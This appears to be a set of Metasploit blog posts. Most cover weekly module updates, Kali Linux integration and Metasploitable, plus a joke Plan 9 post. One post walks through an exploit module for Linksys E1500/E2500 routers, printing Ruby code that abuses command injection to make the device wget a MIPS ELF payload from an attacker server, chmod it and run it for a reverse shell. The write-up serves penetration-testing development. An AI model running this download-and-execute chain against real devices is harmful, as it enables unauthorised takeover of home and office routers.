If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Normally we don't get a lot of contributions regarding embedded devices. Even when they are an interesting target from the pentesting point of view, and is usual to find them out of DMZ zones on corporate networks. Maybe it's because access to these devices or the software running in top of them is not so easy. Maybe because usually they are based on MIPS architectures which hasn't get so much attention as x86 or ARM architectures. Or maybe because it's not so easy always to run the their software in a  controlled (debugged) fashion.


Netgear-DGN2200B-WLAN-Router-mit-Modem-Push-n-Connect.jpg

Fortunately, Michael Messner (aka m-1-k-3) is the exception, he isn't only doing an awesome work about vulnerability research on small Linux routers, but also doing a great work writing modules targeting these embedded devices in order to fingerprint devices, retrieve configuration files or getting shells. In this blog post we would like to share with all you a successful (spoiling!) trip until a shell which we did with m-1-k-3. The blog post also introduces some of the new improvements of Metasploit in order to speed exploit development on MIPS based devices.

 

 

This story started with m-1-k-3 doing some pull request for auxiliary modules achieving remote OS command execution in MIPS network-related embedded devices through their web interfaces:

 

  • #1618: Remote command execution on Netgear DGN2200B
  • #1636: Remote command execution on Netgear DGN1000B
  • #1640: Remote command execution on D-Link DIR-615

 

Unfortunately, after reviewing them and discussing the topic with other Metasploit developers, we asked m-1-k-3 to convert these auxiliary modules into remote exploits. Normally, after getting a way to execute arbitrary OS command it's more or less easy to get a Metasploit session and a working exploit. Exploits are preferred because Metasploit users benefit in two ways:

 

  1. They get easy and powerful interaction with the target through a session.
  2. They benefit from post-exploitation modules.

 

Unfortunately, it's usual on embedded devices to have available only a small set of OS commands through a restricted busybox shell and a few more tools. Here is, for example, the set of available commands on a DGN 1000B device:

 

[            br2684ctld    dmesg            igmp          ln          nbtscan      pppd                routed          udhcpd
[[          brctl        dnrd            import_ca.cgi  ls          netgear_ntp  pppoe              scfgmgr          umount
adslmod      busybox      dsl_cpe_control  init          lsmod      nvram        pppoe-relay        setup.cgi        upgrade_flash.cgi
aes-up.sh    cat          dsl_diag        insmod        md5sum      oamd        ps                  setupwizard.cgi  upload.cgi
ash          chmod        echo            iptables      mini_httpd  oamlbsearch  rc                  sh              wget
athcfg      cmd_agent_ap  ez-ipupdate      iptpat_util    miniupnpd  pb_ap        reboot              sleep            wifi_monitor
atmarp      conf          free            kill          mkdir      ping        restore_config.cgi  smtpc            wizard
atmarpd      cp            halt            killall        mknod      pot          rm                  syslogd          wpa_supplicant
atm_monitor  crond        hostapd          klogd          mount      potcounter  rmmod              test            wpatalk
br2684ctl    cut          ifconfig        lld2          mv          poweroff    route              udhcpc          wsc_det

















 

After discussing the possibilities with @m-1-k-3 we concluded it wasn't a good idea to write CMD exploits for these devices, because of two points:

 

  1. In the best case we would need new payloads which would be device specific.
  2. Native payloads (and shell sessions) are more powerful than CMD payloads.

 

After discarding CMD type exploits, we switched to the possibility of staging from CMD to the execution of a native payload. Since it's usual to have tools such as wget, or alternative ways to download files from remote hosts to the embedded device, it sounded like a good option. In fact, sounded like a perfect solution for us. But there was another pitfall. There wasn't support to create MIPS ELF (nor big endian neither little endian) executables still in Metasploit, So the MIPS payloads couldn't be embedded into executable files programmatically. Fortunately add the support was as easier as:

 

1) Create tiny ELF templates for the MIPS architectures (little and big endian). In the case of MIPSLE something like:

 

BITS 32


org 0x00400000


ehdr:                            ; Elf32_Ehdr
  db    0x7F, "ELF", 1, 1, 1, 0  ;  e_ident
  db    0, 0, 0, 0,  0, 0, 0, 0  ;
  dw    2                        ;  e_type      = ET_EXEC for an executable
  dw    0x8                      ;  e_machine    = MIPS
  dd    1                        ;  e_version
  dd    _start                  ;  e_entry
  dd    phdr - $$                ;  e_phoff
  dd    0                        ;  e_shoff
  dd    0                        ;  e_flags
  dw    ehdrsize                ;  e_ehsize
  dw    phdrsize                ;  e_phentsize
  dw    1                        ;  e_phnum
  dw    0                        ;  e_shentsize
  dw    0                        ;  e_shnum
  dw    0                        ;  e_shstrndx


ehdrsize equ  $ - ehdr


phdr:                            ; Elf32_Phdr
  dd    1                        ;  p_type      = PT_LOAD
  dd    0                        ;  p_offset
  dd    $$                      ;  p_vaddr
  dd    $$                      ;  p_paddr
  dd    0xDEADBEEF              ;  p_filesz
  dd    0xDEADBEEF              ;  p_memsz
  dd    7                        ;  p_flags      = rwx
  dd    0x1000                  ;  p_align


phdrsize equ  $ - phdr


_start:

















 

2) Add support to MSF::Util::EXE to have into account the new templates, so MIPS ELF executables could be created through the use of the mixin, by calling the Msf::Util::Exe.to_executable() API. Or also through the Msf::Exploit::EXE mixin, by calling its generate_payload_exe() method. If you would like to review, exactly, how the support was added you can check the next pull requests:

 

  • #1666: Support for MIPSLE ELF.
  • #1671: Support for MIPSBE ELF.

 

With the support for MIPS ELF executables available on Msf::Util::EXE it's just a matter of coding to have available these awesome embedded devices exploits. And m-1-k-3 started writing the first of (we hope!) a long serie of embedded devices exploits. In this first module an authenticated os command injection, on the Web Interface of the Linksys E1500/E2500 Wireless routers, is abused. The vulnerability details can be found in the original advisory. And the full exploit writing history can be found in the next pull request: "#1688: Linksys E1500/E2500 Remote Command Execution". As a summary, in order to execute the shell payloads the staging is accomplished by:

 

1) Create a MIPS ELF with the payload to execute after include the Msf::Exploit::EXE mixin:

 

@pl = generate_payload_exe













 

2) Start a Web Server (or use an external one).

 

#
# start our server
#
resource_uri = '/' + downfile


if (datastore['DOWNHOST'])
  service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
else
  #do not use SSL
  if datastore['SSL']
  ssl_restore = true
  datastore['SSL'] = false
  end


  #we use SRVHOST as download IP for the coming wget command.
  #SRVHOST needs a real IP address of our download host
  if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
  srv_host = Rex::Socket.source_address(rhost)
  else
  srv_host = datastore['SRVHOST']
  end


  service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
  print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
  start_service({'Uri' => {
  'Proc' => Proc.new { |cli, req|
  on_request_uri(cli, req)
  },
  'Path' => resource_uri
  }})


  datastore['SSL'] = true if ssl_restore
end























 

3) Use the Web Server to sent the ELF with the embedded payload on new requests:

 

# Handle incoming requests from the server
def on_request_uri(cli, request)
  #print_status("on_request_uri called: #{request.inspect}")
  if (not @pl)
  print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
  return
  end
  print_status("#{rhost}:#{rport} - Sending the payload to the server...")
  @elf_sent = true
  send_response(cli, @pl)
end













 

4) Exploit the remote OS command injection to download the MIPS ELF payload with the available wget tool:


#
# download payload
#
print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
#this filename is used to store the payload on the device
filename = rand_text_alpha_lower(8)


#not working if we send all command together -> lets take three requests
cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
res = request(cmd,user,pass,uri)
if (!res)
  fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
end

















5) Exploit the remote OS command injection to give execution permissions to the downloaded binary:


#
# chmod
#
cmd = "chmod 777 /tmp/#{filename}"
print_status("#{rhost}:#{rport} - Asking the Linksys device to chmod #{downfile}")
res = request(cmd,user,pass,uri)
if (!res)
  fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
end














6) Exploit the remote OS command injection to execute the downloaded binary:


#
# execute
#
cmd = "/tmp/#{filename}"
print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
res = request(cmd,user,pass,uri)
if (!res)
  fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
end














7) Enjoy! After a long and funny trip now we can enjoy Linksys E1500 shells (thanks m-1-k-3!):

reverse_shell_blog.png

Linksys E1500 reverse shell session (shared by m-1-k-3)

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions.

Minecraft-Vectored Malware

Metasploit exploit developer Juan @_juan_vazquez_, while trawling the Internet for the next hot exploit, came across this pastie describing a Java exploit which takes advantage of a vulnerability in Java's Color Management classes. Turns out, this is also one of the vulns being exploited in McRat, a Trojan targeting Windows-based Minecraft players (that's what the "Mc" stands for).

 

McRat is compelling to potential victims because of its specificity and large potential victim pool. By targeting Minecraft players, attackers are specifically avoiding the browser vector, for starters. They're also playing on people's tendency to install non-work related software on work machines, so your victims, by default, are not going to get a lot of love from their IT departments. On top of this, they're more likely to ignore the blanket advice to "disable Java," because they may not be aware that disabling Java in the browser won't, in fact, impact their stand-alone Minecraft experience.

 

There's since been a patch for this vulnerability -- it looks like Oracle is moving ever faster to knock out patches for these things. They also appear to have abandoned their quarterly patch cycle for all practical purposes when it comes to actively exploited security issues. If you haven't updated yet to Java 7u17 (or 6u43), now's a good time. If you believe you've patched, you can use the new module, Java CMM Remote Code Execution, to make sure.

 

PHP Shell Games

Speaking of malicious attacker software, this week also sees a quartet of new modules from community contributor bwall. We are now shipping modules targeting Ra1NX, STUNSHELL (two for that one), and v0pCr3w's shell.

 

These kinds of hack-the-hacker modules can be particularly useful on a penetration testing engagement. Not only are you able to identify machines that were compromised before you got there, but you can turn around and use the existing compromises to extend your own control over the affected assets. As egypt likes to say in his Metasploit training classes, "there is no cheating in hacking." Of course, you will want to alert your client pretty much right away and advise them on their current compromised situation.

 

MongoDB

I have it on good authority that internationally renowned superhacker and MongoDB user HD Moore was (quote) "just looking at that code," and was bummed that he didn't spot the vulnerability before agix. So it goes with bug-hunting, you can't win 'em all, and there are plenty of smart, dedicated exploit developers in the world who have just as good a shot at uncovering exploits that other smart, dedicated exploit devs might miss the first time around. In this case, it was community contributor agix who discovered the vulnerability in MongoDB and proved it out with a Metasploit module. 10gen, the primary maintainers of MongoDB, turned out a patch nearly immediately, so if you're a MongoDB user, you'll want to pick that up pronto.

 

New Modules

Wow, this post ended up being all about exploit content. Here are the rest of the modules -- 10 new ones, including those detailed above. In fact, the only non-exploit we have this week is a post-exploitation module for sneaking UNC paths into Word documents, courtesy of community contributor Sphaz. Thanks everyone!

 

 

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Unix, Evolved

 

Today, we are delighted to announce the next phase of Metaploit's expanded support for more diverse host operating systems. On the heels of our integration work with Kali Linux, we've been heads-down on putting the finishing touches on our support for the future of Unix, Plan 9 from Bell Labs.

 

plan9-msfconsole.png

 

This renewed commitment to Plan 9 will come as a welcome relief for those of you who have, until now, been stuck on hobby operating systems such as Linux and FreeBSD -- academics and other researchers agree that Plan 9's rethinking of the file system mount points and distributed hardware models is ideal for today's networking environment. As we continue to blur the distinctions between the "extranet" and the "cloud," an operating system designed for distributed software and hardware is the most sensible choice for penetrations testers, exploit developers, and IT operations.

 

If you've been living under a rock for the last several years and have somehow avoided using Plan 9 so far, feel free to check the reference VMWare appliance. I'm sure you'll find the interface both intuitive and powerful. How could you not love an operating system that lets you mount a remote Ethernet interface as a local file system entity? Who needs clicking on hyperlinks when you can just mount the web site and use ls, grep, and find to navigate? Plan 9's utility as a pen-testing platform is apparent to anyone who's been brave enough to make the switch.

 

For those of you who have already made the switch, please feel free to comment below on your experiences with using Metasploit on this most excellent platform for security professionals. Readers are also encouraged to post here screenshots of Metasploit running on their own preferred operating system, be it a P9 derivative like 9Front or Inferno, or some other comparable OS such as NeXTSTEP, BeOS, SCO Open Desktop, or really any other device you're likely to use on an engagement.

Consumer-Grade Hacking

Last month, I talked about community contributor Michael @m-1-k-3 Messner's nifty D-Link authentication bypass, and made the case that having Metasploit modules for consumer-grade access points is, in fact, useful and important.

 

Well, this week's update has a pile of new modules from m-1-k-3, all of which are targeting these kinds of consumer-grade networked devices: We now have a Linksys E1500 / E2500 remote command exec exploit, a Linksys 1500 directory traversal exploit, a directory traversal module for TP-Link's TL-WA701ND access point, a password extractor for the DLink DIR-645, and a directory traversal module for NetGear's weird single-purpose cordless phone device.

 

That's right, we have a Metasploit module for a cordless phone. The era of there being a difference between your "electronic devices" and your "computer devices" is coming to a close. What I said last month about these sorts of devices being in scope for a pen-test still stands -- if they're not in scope today, they really ought to be, at least for key personnel. Criminals don't particularly care about your scope doc.

 

Thanks loads, m-1-k-3, for your work on these!

 

Who shot who in the what now?

This week's update includes a .mailmap file which consolidates the identities of contributors. For example, you can now see easily that the majority of contributors are, of course, not Rapid7 employees. This speaks to the power of the open source model of security software development that we employ here; even if Rapid7 tomorrow decided to pull the plug on this whole Metasploit thing and prohibited us from working on it, Metasploit will live on.

 

Technically, .mailmap helps consolidate "identities" to "humans," so things like 'git shortlog' and 'git blame' / 'git praise' are more meaningful. I use this data all the time to be able to determine who's committing what, and I'm sure third-party sites like Ohloh are doing the same.

 

The information used to populate the .mailmap was collected from git commit messages, so if you have personal info in there that you don't want, then a) be more careful with your own git config files, and b) let me know and I'll excise or anonymize or whatever.

 

Rake DB tests

I've talked about our slouching into the modern era of Ruby development before, and Rapid7 Metasploit Pro developer Luke @KronicDeth Imhoff has been valiantly championing that cause. The latest major change has been bringing the ability to "rake db" directly in Metasploit Framework, as of Pull Request #1592. This allows for all the usual database migrations, rollbacks, and drops that Rails developers are accustomed to having available. It also allows for direct testing of a lot of database-backed functionality, so this also strikes another blow for TDD.

 

Incidentally, if you are the sort to open a pull request on Metasploit, check out Luke's Verification Steps. This kind of initial documentation is massively useful for reviewers, as it really helps to demonstrate why your change is needed, what you think intended functionality is, and gives hints on how to test that your change is actually successful.

 

Msfupdate: Adios SVN

This is your final warning. If you're on an SVN checkout for Metasploit, you want to upgrade now. 'msfupdate' no longer will update over SVN; it will tell you to get your act together and exit out with code 0x11. This has been warned about since November of 2012. The SVN server is still up, so you can use regular svn commnads to get a checkout going (or edit your own version of msfupdate), but really, honest and true, you need to either (a) get a binary install for Metasploit, which comes with both Framework and Metasploit Community / Pro, or (b) get a local git clone of the source and track along with that. Both mechanisms are described at http://r-7.co/MSF-UP.

 

New Modules

We've got fourteen new modules this week -- half exploits, half aux/post. Enjoy!

 

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes..

Version bump to Metasploit 4.5.3

This week, we've incremented the Metasploit version number by one trivial point to 4.5.3 -- this was mainly done to ensure that new users get the fixes for the four most recent vulnerabilities that were fixed by Rails 3.2.13. While we're not aware of any exploits out there that are targeting Metasploit in particular (and these vulns do require to be targeting specific applications), you'd be advised to update at your earliest convenience.

 

In addition, 4.5.3 is once again a code-signed executable for Windows -- Linux users can still verify their bins by checking the appropriate SHA1 and PGP signature. Since we go to all the trouble of producing these signatures, you should probably check them. Not getting backdoored is a Good Thing.

 

Kali Linux

This is the first update released after our integration with the new and improved Kali Linux, I'm super excited about supporting Kali for real as a Metasploit platform with all the QA love that we give Ubuntu, Red Hat, and Windows. More interestingly, from  a technical standpoint, Metasploit Framework, Community & Pro have all been built as as Debian packages, so if this whole Kali thing works out, I'm cautiously optimistic about packaging in a similar way for similar platforms -- Ubuntu, Mint, Debian, and all the rest. That will be a glorious day indeed.

 

Hopefully, you had a chance to drop in on the March 21 webcast featuring HD Moore, Mati Aharoni, and Devon Kearns. If you didn't, no problem -- you can access the on-demand version here.

 

YARD

Finally, if you've been tracking along the commit history, you will have noticed that we've been embracing YARD as a standard for decorating classes and methods in the core Metasploit library. So, if you'd like to get some up-to-date documentation on an API call that you find a little mysterious, you can try typing yard doc in the top level of your Metasploit Framework source checkout then click around doc/index.html with your favorite browser.

 

If you don't find the documentation that you're looking for at that point, then hey, feel free to write some! We will totally take a pull request of insightful documentation for our many APIs, and YARD doc syntax is pretty easy to get a handle on. Check the YARD Guides to get started.

 

New Modules

Here are this week's new modules. It's an even dozen for your pen-testing pleasure.

 

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

metasploitable ss.JPG

This week our Whiteboard Wednesday topic is on Metasploitable, our intentionally vulnerable virtual machine. Christian Kirsch from the Metasploit team, would like to talk about the finer points of how to download, install, and use this free tool as a test lab to get familiar with Metasploit. A lot of our customers are hesitant to use Metasploit on production machines, so this tool gives you the ability to sharpen your exploit knives with no risk.

 

Watch the video here!

 

Let us know what you think, any other topics you'd like us to cover, or feel free to leave us a comment below.

 

See you next Wednesday!

-Patrick Hellen

Today, our friends at Offensive Security announced Kali Linux, which is based on the philosophy of an offensive approach to security. While defensive solutions are important to protect your network, it is critical to step into the shoes of an attacker to see if they’re working. Kali Linux is a security auditing toolkit that enables you just that: test the security of your network defenses before others do.


Kali is a free, open source, and robust Linux Distribution that makes security auditing ready for the enterprise. It is the natural evolution of the BackTrack platform, which has been hugely popular among Metasploit users. This is why the Metasploit team here at Rapid7 was more than happy to join the Kali Linux project as an official contributor. We re-engineered Metasploit to fully integrate into the Kali Linux repositories and resolved some of the issues that may have caused some of you headaches with updates, databases, and general stability on BackTrack in the past.

 

To hear more about this topic, tune in to our free webcast with HD Moore (Metasploit Chief Architect), Mati Aharoni, and Devon Kearns (both from the BackTrack & Kali Linux team) on March 21 at 3pm Eastern.

 

If you can't wait that long, here's my short video to get an overview of Kali Linux:


wbw-video-kali.jpg.png

 

If you'd like to start using Metasploit on Kali Linux, you may benefit from these tips:


  1. Download the Kali Linux Virtual Machine from www.kali.org, or install your own using instructions at http://docs.kali.org/general-use/install-vmware-tools-kali-guest
  2. Kali Linux doesn't start any application services by default to shorten the boot up time and reduce the attack surface to a minimum.
    1. To start Metasploit's services immediately, open a terminal window and enter service postgresql start && service metasploit start
    2. To start Metasploit's services on each boot time (but not immediately), open a terminal window and update-rc.d postgresql enable && update-rc.d metasploit enable
      metasploit-kali-service-start.jpg

  3. To start Metasploit Framework, open the Applications menu > Kali Linux > Top 10 Security Tools -> Metasploit Framework
    metasploit-kali-metasploit-framework.jpg
  4. To start the web ui for Metasploit Community or Metasploit Pro, you have two options:
    1. Type the new go_pro on the Metasploit Framework console (only available in Kali Linux for now), which starts all services and then launches the browser with http://localhost:3790, the URL of the Metasploit Community / Pro web-based user interface
      metasploit-kali-go_pro.jpg

    2. Open the menu Applications -> Kali Linux -> Exploitation Tools -> Metasploit -> metasploit community / pro

 

In case you have more questions, we have prepared an FAQ about Kali Linux and Metasploit.

 

I hope you'll enjoy using Metasploit Framework, Metasploit Community, and Metasploit Pro on Kali Linux. If you'd like to learn more about Kali Linux and Metasploit, attend our free webcast with HD Moore (Metasploit Chief Architect), Mati Aharoni, and Devon Kearns (both from the BackTrack & Kali Linux team) on March 21 at 3pm Eastern.

Filter Blog

By date: By tag: